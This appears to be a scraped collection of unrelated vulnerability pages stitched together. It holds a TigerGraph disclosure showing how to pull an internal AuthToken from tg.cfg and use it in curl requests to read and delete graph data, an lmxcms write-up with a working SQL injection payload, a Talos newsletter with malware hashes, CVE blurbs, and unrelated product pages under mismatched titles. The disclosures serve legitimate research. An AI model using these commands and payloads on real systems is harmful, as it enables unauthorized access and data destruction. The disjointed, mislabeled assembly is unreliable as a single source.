An issue was discovered in TigerGraph Enterprise Free Edition 3.x. It creates an authentication token for internal systems use. This token can be read from the configuration file. Using this token on the REST API provides an attacker with anonymous admin-level privileges on all REST API endpoints.

The TigerGraph platform provides users with a REST API that allows authenticated users the ability to load data into the database, query the database, and update the database.

This report highlights that an authentication token – that is used internally by the TigerGraph system – can be read from configuration files stored on the TigerGraph platform. And that anyone using this token is granted administrative privileges across all REST API endpoints. Thereby, allowing an attackerto read and write to any graph in the platform.

**Impact**

Severe.

Unauthorized users can exfiltrate or corrupt any data contained within the TigerGraph platform.

**Products/Versions Affected**

*   TigerGraph Enterprise Free Edition 3.7.0 Docker Image
*   TigerGraph Enterprise Free Edition 3.7.0
*   TigerGraph Cloud

We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).

**Steps to Reproduce****Download and Run TigerGraph**

Using docker download at the latest TigerGraph image and start the server:

**1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:**

docker rm tigergraph
docker pull docker.tigergraph.com/tigergraph:latest

**2.) Download and run the docker image (note: we do not need to attach a volume):**

docker run -d 
-p 14022:22 
-p 9000:9000 
-p 14240:14240 
--name tigergraph 
--ulimit nofile=1000000:1000000 
-t docker.tigergraph.com/tigergraph:latest

**3.) Once the container has started, connect to it via ssh (note: the default password is ‘tigergraph’):**

ssh -p 14022 tigergraph@localhost

**4.) Start all TigerGraph services:**

gadmin start all

**5.) Using GSQL, create a new graph called test and add a node to it:**

 $ gsql
GSQL> CREATE VERTEX Node(PRIMARY\_ID id UINT, value STRING) WITH primary\_id\_as\_attribute="true"
GSQL> CREATE GRAPH test(\*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test {
GSQL>   INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello”)

**6.) Enable RESTPP authentication**

gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

**Obtaining Administrative Credentials**

To demonstrate that the administrative level web credentials are readily obtainable we download them via the AdminPortal. Although, this step assumes that the login credentials of the administrative user are known; a situation that is plausible (see CVE-2022-xxxxx which details how to locate the login credentials of the administrative user within the system logs).

If however, the login credentials are not known, the web credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2022-xxxxx where a user with low-levels of privilege is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate these web credentials under normal operating conditions by exploiting GSQL’s UDF facility to read arbitrary files (see CVE-2022-30331).

**Login To The AdminPortal**

The simplest way to obtain the administrative users login credentials is using AdminStudio and to do this follow these steps:

**1.) Open a web-browser and go to http://localhost:14240 where you will be able to login to GraphStudio using the tigergraph user:**

**2.) Click on the “Admin” button on the top-right corner to switch into administrative mode (called the AdminPortal).**

**Downloading Web Credentials via AdminPortal**

Once logged into the AdminPortal follow the following steps to download the TigerGraph configuration file:

1.  On the left-hand side expand the “Others” menu.
2.  Click on “GSQL Output File” to open the file preview pane.
3.  In the “File path” textbox enter the text “/home/tigergraph/tigergraph/data/configs/tg.cfg“.
4.  Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
5.  Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1\_tg.cfg.

**Note**: When tested we found that the GUI was unable to download files that were symbolically linked. So if the files that you download in step 5 are corrupted follow the steps in the next sections to find the location of the actual file.

**Symbolic Linking Issue**

Once logged into AdminPortal perform the following steps:

1.  On the left-hand side expand the “Monitor” menu.
2.  Click on “Logs” to open the window that allows you to search through the system logs.
3.  In the “Pattern” textbox enter the text “LinkFilePath“.
4.  Under components de-select all components except “CONTROLLER”.
5.  Click “Search” to perform the search and return any matches.
6.  Finally, click on any match from the controller log file. (The file name starts “/controller” and ends in “.log”). Doing this will take you to the entry in the log file (shown below).

Once inside the log file you need to locate both the LinkFilePath and the SourceFilePath entries for tg.cfg. In the screenshot above we found these values to be:

*   LinkFilePath:"/home/tigergraph/tigergraph/data/configs/tg.cfg"
*   SourceFilePath:"tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ=="
*   tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

Now to construct the absolute file path to the configuration file replace tg.cfg in LinkFilePath to the value specified by SourceFilePath. In our example, this created the following path: /home/tigergraph/tigergraph/data/configs/tg.cfg.eyJDb3VudGVyIjoxMTEsIk1ldGFWZXJzaW9uIjoidjEiLCJWZXJzaW9uIjoxNjU1NDk2NDg0NjIwMjIxNjkyfQ==

To download this file repeats the same process as described in the section Downloading Web Credentials via AdminPortal but instead use the path that we calculated in this section.

**Using The Administrative Web Token Credentials To Obtain Access**

Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.

**1.) Locate the value of the administrative AuthToken in the configuration file that you obtained. This can either be done using the linux command line as shown below (or opening the file in a text editor and using the in-build find functionality):**

cat m1\_tg.cfg | grep AuthToken

"\\"MaxAuthTokenLifeTimeSec\\": 0",
"\\"AuthToken\\": \\"9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe\\"",

**2.) Do a quick sanity test to check that authentication is enabled on the REST API:**

curl -X GET http://127.0.0.1:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":true,"message":"Access Denied because the input token = '' is empty","code":"REST-10016"}%

**3.) Now we are able to send requests to REST APIs using our administrative AuthToken. Below we use it to return a list of vertices from our test graph:**

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/Node
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[{"v\_id":"1","v\_type":"Node","attributes":{"id":1,"value":"hello"}}\]}%

**4.) We can use these REST endpoints to create/read/updated/delete any graph in the system. Below we use the administrative token to delete a vertex and then do a check it was deleted:**

curl -X DELETE \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":{"v\_type":"V1","deleted\_vertices":1}}%

curl -X GET \\
-H 'Authorization: Bearer 9voePXkP0GlojPpj6PZ2vWU6sSrQQHbe' \\
http://localhost:9000/graph/test/vertices/V1
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":\[\]}%

CVE-2023-22951: Unsecured Web Credentials

Auto Dealer Management System v1.0 was discovered to contain a SQL injection vulnerability.

\[CVE ID\]

CVE-2023-27667

\[PRODUCT\]

Auto Dealer Management System - v 1.0

\[VERSION\]

Auto Dealer Management System - v 1.0

\[PROBLEM TYPE\]

SQL Injection

\[DESCRIPTION\]

SQL Injection on page view\_car\_type.php and parameter is id, application url is (/view\_car\_type.php?id=?)

Can be called without authorized access.

CVE-2023-27667: CVE-2023-27667

An issue was discovered in TigerGraph Enterprise Free Edition 3.x. Data loading jobs in gsql_server, created by any user with designer permissions, can read sensitive data from arbitrary locations.

CVE-2023-22950: Data Loading Vulnerability

Microsoft zero-days, dark web forum takedowns and Pentagon leaks on Discord in this week's newsletter.

Thursday, April 13, 2023 14:04

Welcome to this week’s edition of the Threat Source newsletter.

Law enforcement organizations across the globe notched a series of wins over the past few weeks against online forums for cybercriminals.

On March 23, the FBI announced it disrupted the online cybercriminal marketplace BreachForums, known for being a place where users could buy and sell stolen user information. They also arrested a 20-year-old suspected of being the site’s founder and main administrator.

Then last week we had “Operation Cookie Monster” in which several international agencies worked together to take down Genesis Market, a similar dark web forum, arresting dozens of suspected users and administrators.

These arrests and network operations are important in that they disrupted sites that were known for highly sensitive information and served as a place for some of the most prolific cyber criminals to make money. The U.S. Department of Justice estimated that Genesis Market was responsible for the sale of data on more than 1.5 million compromised computers around the world containing over 80 million account access credentials. And the U.K.’s National Crime Agency (NCA) said credentials were available for as little as 70 cents to hundreds of dollars depending on the stolen data available.

But the user base for these sites was also huge (after all, someone had to be buying those credentials). At the time of its takedown, BreachForums had 340,000 members, according to the FBI. And reporting on Operation Cookie Monster stated that Genesis Market had 59,000 registered users.

So while it’s great that these sites have been disrupted, I can’t help but assume that two more sites are going to pop up to service these cyber criminals. It’s impossible for any agency to arrest 340,000 people, so even if a handful of administrators are restricted from accessing the internet for a while, the other 339,000 people are going to be looking for a new home.

Some of the same agencies celebrated in March 2021 that they disrupted Emotet, one of the most infamous botnets ever. As anyone who follows security news will know, Emotet didn’t actually go anywhere and was recently rebooted as recently as last month, according to our research.

RaidForums, a forefather of BreachForums, was also disrupted in April 2022, along with the arrest of several administrators and accomplices.

All of this is not to discount the great strides made in the past few weeks in disrupting these marketplaces and taking them offline. But a lot of these headlines are sounding familiar to me after a few years, so it’s important to remember that we as a security community can’t take our foot off the gas and assume that because there were a few big wins that dark web forums are just going to go away forever.

**The one big thing**

Microsoft’s Patch Tuesday for April included another zero-day vulnerability in the Windows Common Log File System Driver. CVE-2023-28252, which could allow an attacker to obtain SYSTEM privileges, is actively being exploited in the wild, according to Microsoft. The U.S. Cybersecurity and Infrastructure Security Agency already added the vulnerability to its list of know exploited issues and urged federal agencies to patch it as soon as possible. Microsoft disclosed a similar zero-day issue in September that could also lead to the same privileges: CVE-2022-37969.

**Why do I care?**

Security researchers say that the vulnerability has already been exploited in Nokoyawa ransomware attacks, so it’s important to patch this issue as soon as possible. The Nokoyawa ransomware is known for targeting 64-bit Windows systems in double extortion attacks in which the actors encrypt targets’ files and then threaten to leak them unless the ransom is paid.

**So now what?**

Microsoft has a patch available, so all Windows users should update now if they haven’t already. Talos also has new Snort detection coverage available for CVE-2023-28252 and other vulnerabilities disclosed as part of Patch Tuesday.

**Top security headlines of the week**

**A trove of classified military documents and images leaked on several social media channels** over the past week, including potentially sensitive information on Russia’s invasion of Ukraine and China’s military plans. The images first surfaced in a Discord channel, eventually making their way onto the Telegram messaging app, the popular forum 4Chan and then broader social media sites like Twitter. The U.S. Department of Justice and the Pentagon have since launched a formal investigation into the leaks. Ukrainian officials have blamed Russian actors for the leaks, trying to cast doubt on the authenticity of the images, while Russia accused Western governments of trying to spread disinformation. (Bellingcat, New York Times)

**Apple released patches for two zero-day vulnerabilities** targeting current and older versions of iOS, iPadOS, macOS and Safari that attackers were exploiting in the wild. The vulnerabilities, CVE-2023-28206 and CVE-2023-28205, could lead to arbitrary code execution. CVE-2023-28206 specifically could allow an adversary to execute code with kernel privileges. Apple initially patched the issue in current iPhones and other devices and followed up a few days later with fixes for older hardware like the iPhone 8. This was the third instance of Apple patching a zero-day vulnerability since the start of the year. (SC Media, Security Week)

**The FBI warned users again this week against plugging their phones in public charging stations** at common spaces like airports, hotels and shopping centers. The agency stated that threat actors have found ways to use the public USB ports to “introduce malware and monitoring software onto devices." Instead, the Federal Communications Commission suggests users carry their own USB cables and charging blocks to plug directly into outlets rather than relying on or trusting a cable. However, the tweet from the FBI’s Denver office did not offer examples of any recent attacks that would have prompted a fresh warning. (Axios, NBC News)

**Can’t get enough Talos?**

*   How threat actors are using AI and other modern tools to enhance their phishing attempts
*   How do you hunt cybersecurity threats in a war zone? Like this
*   Cisco unveils latest security trends from Cisco Talos report at GISEC 2023
*   Researcher Spotlight: Giannis Tziakouris first learned how to fix his family’s PC, and now he’s fixing networks all over the globe

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Talos Incident Response: On Air** **(April 27)**

Virtual

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** e248b01e3ccde76b4d8e8077d4fcb4d0b70e5200bf4e738b45a0bd28fbc2cae6  
**MD5:** 1e2a99ae43d6365148d412b5dfee0e1c  
**Typical Filename:** PDFpower.exe  
**Claimed Product:** PdfPower  
**Detection Name:** Win32.Adware.Generic.SSO.TALOS

**SHA 256:** f3d5815e844319d78da574e2ec5cd0b9dd0712347622f1122f1cb821bb421f8f  
**MD5:** a2d60b5c01a305af1ac76c95e12fdf4a  
**Typical Filename:** KMSAuto.exe  
**Claimed Product:** N/A  
**Detection Name:** W32.File.MalParent

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

Threat Source newsletter (April 13, 2023) — Dark web forum whac-a-mole

AM Presencia v3.7.3 was discovered to contain a SQL injection vulnerability via the user parameter in the login form.

2023 Copyright. All Rights Reserved.

Privacy Policy

CVE-2023-27779: alo.com

bloofox v0.5.2 was discovered to contain an arbitrary file deletion vulnerability via the delete_file() function.

**Welcome to bloofoxCMS**

  
bloofoxCMS is a free open source content management system (CMS). bloofoxCMS is a small and easy to use CMS. It enables you to manage websites and intranet sites on a very simple way. It is slim but also flexible. You may use and download it **free of charge** without any limitations. But it would be a great pleasure to receive a small donation.

  
\[ Features \] \[ Download \]

**bloofoxCMS Key Features**

  

Very **easy installation** over web browser by using an automated install process with only 2 steps. If you prefer a manual setup just use our SQL dump files.

**Easy to use admin panel** with structured areas. You need only a short training period. The Admincenter includes an intuitive user interface.

More simply and fast expandable program code also for PHP beginners. Every php developer is able to extend the code with additional individual code lines.

Fast customization und creation of individual template designs with HTML or XHTML and CSS (cascading stylesheets). Our **templates are completely free of PHP code**. Even web designers without PHP knowledge can create templates.

   

  
**Latest News**

bloofoxCMS 0.5.2.1 available

Read more

bloofoxCMS 0.5.1 available

Read more

bloofoxCMS now available on github

Read more

**Make a donation**

You may help us by making a little donation. Please click the image beside. Thanks for your support!

CVE-2023-27812: bloofoxCMS - Home

lmxcms v1.4.1 was discovered to contain a SQL injection vulnerability via the setbook parameter at index.php.

This is the message page of the front desk  

Find the back-end code through the front page. The ischeck is to judge whether the content of the message is displayed on the page. There are several key functions in the picture.  
Function call flow:  
index() calls checkDate()  
checkDate() calls the filter\_strs($\_POST) function to filter strings  
checkDate() calls the p() function again to prevent injection  
The p() function calls the filter\_sql() function to filter the reserved characters of mysql to prevent injection  
Then index() continues execution and calls the add() function  
The add() function calls the addModel() function in turn  
addModel() function and then addDB() function  
$sql in the addDB() function is an insert statement, where the value of $value comes from $data, and the value of $date is a parameter we can control.  
  
  
  
  
  
  

Add echo $sql to output complete sql statement, which is convenient for constructing payload.  

Packet analysis  

After inserting the page, the message will not be displayed, only when ischeck=1 will it be displayed in the foreground  
  

There are a lot of filtering functions in the previous code, but I found that these filtering functions only filter the 'value' in the array $data, but not the 'key', and the front page will echo only when ischeck=1 , so construct the payload and close the INSERT statement.  
payload: name=x&mail=x&tel=x&content=x&setbook=%E6%8F%90%E4%BA%A4&ischeck=1&time)VALUES(user(),1,1,1,1,1,1);#=1  
  

Protection Advice  
Filter the keys in the array as well

CVE-2023-29598: lmxcms v1.4.1 Front page sql injection · Issue #3 · jspring996/PHPcodecms

bloofox v0.5.2 was discovered to contain a SQL injection vulnerability via the component /index.php?mode=content&page=pages&action=edit&eid=1.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-29597: bloofox 0.5.2 sql injection · Issue #2 · jspring996/PHPcodecms

Auth. SQL Injection') vulnerability in Kunal Nagar Custom 404 Pro plugin <= 3.7.0 versions.

**Solution**

Update the WordPress Custom 404 Pro plugin to the latest available version (at least 3.7.1).

Found this useful? Thank minhtuanact for reporting this vulnerability. Buy a coffee ☕

minhtuanact discovered and reported this SQL Injection vulnerability in WordPress Custom 404 Pro Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information. This vulnerability has been fixed in version 3.7.1.

**2 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-47605: WordPress Custom 404 Pro plugin <= 3.7.0 - Admin+ SQL Injection Vulnerability - Patchstack

The Logback component in Terminalfour before 8.3.14.1 allows OS administrators to obtain sensitive information from application server logs when debug logging is enabled. The fixed versions are 8.2.18.7, 8.2.18.2.2, 8.3.11.1, and 8.3.14.1.

In case you missed them, here are some highlights from version 8.3.1 on up.

Release

Highlights

8.3.15

*   Find Sections easier with Section Filtering
*   Several enhancements to Direct Edit, including: 
    
    *   You can now see and visit the URL of the corresponding published page
    *   One-click save and approve
    *   Save as draft
    *   Publish from Direct Edit
    *   Quick Toolbar on rich text
    *   Google Analytics improvements
    *   UI enhancements
*   Improved Current Section Highlighting In The Section Screen
*   After you've duplicated a Section, it will be highlighted, and the Site Structure will scroll to it.

8.3.14

*   Support for MySQL 8.0
*   Improved List performance
*   Daylight Savings Time (DST) For Scheduled Publish/Transfer Times
*   Form Bank Connection Issues Alert
*   Sort Media Items By Last Modified Date 

8.3.13

*   Content Layout versioning
*   Improved Workflow emails
*   There's now an alert when you navigate away from a Content Item unsaved changes
*   Now when you make changes to a Section, you can "Save And Edit Section" to save your changes and keep editing
*   When leaving Direct Edit you can return to the corresponding Section

8.3.12

*   Improved HTML Editor with an updated version of TinyMCE
*   Updated HTML Editor configuration screen
*   You can now Approve Content Items from the Section screen
*   Navigation Menu Filtering
*   Improved weak password checking
*   Improvement to adding items to Multi-Select Lists

8.3.11

*   List re-ordering
*   Support For Oracle 19
*   Section Breadcrumbs Are Now Visible When Editing A Content Item
*   Preview From A Section
*   When A Section Is Saved Initially You Can Return To The Section Screen
*   Add Images To HTML Confirmation Emails

8.3.10

*   Applied branding to the log-in page
*   Social Poster was fixed
*   Form Builder confirmation email can be customized
*   Floating T4 Tag makes it easier to create a T4 Tag
*   Media Item Delete Alert

8.3.9

*   Ellucian Ethos Integration
*   Inherited Page Layout Labelled In Section
*   Create Forms In Languages Other Than English
*   Programmable Layout Linting

8.3.8

*   Workflow and performance enhancements

8.3.7

*   Dashboards feature
*   Task Scheduler Updates
*   Performance improvements

8.3.6

*   Clickable Breadcrumbs In Sections
*   Bulk Deleting Mirrored Content Items

8.3.5

*   CDN/PXL image optimization feature added

8.3.4

*   The Web Services API now uses Token Authentication
*   You can specify the email address(es) that you'd like to use for the sender and reply-to value.

8.3.3

*   Direct Edit enhancements
*   Media Library cropping and variant creation improved
*   Form Builder – Stripe Version Updated To 16.1.0 to support Strong Customer Authentication enforcement

8.3.2

*   Added Media Search so you can search the Media Library 

8.3.1

*   Version 8.3.1 moved to the Java 11 OpenJDK. By making these changes we updated the supported systems, technologies and libraries to make sure we are using more recent, secure and performant components.
*   See the What’s new in 8.3 Guide.

Tag

#sql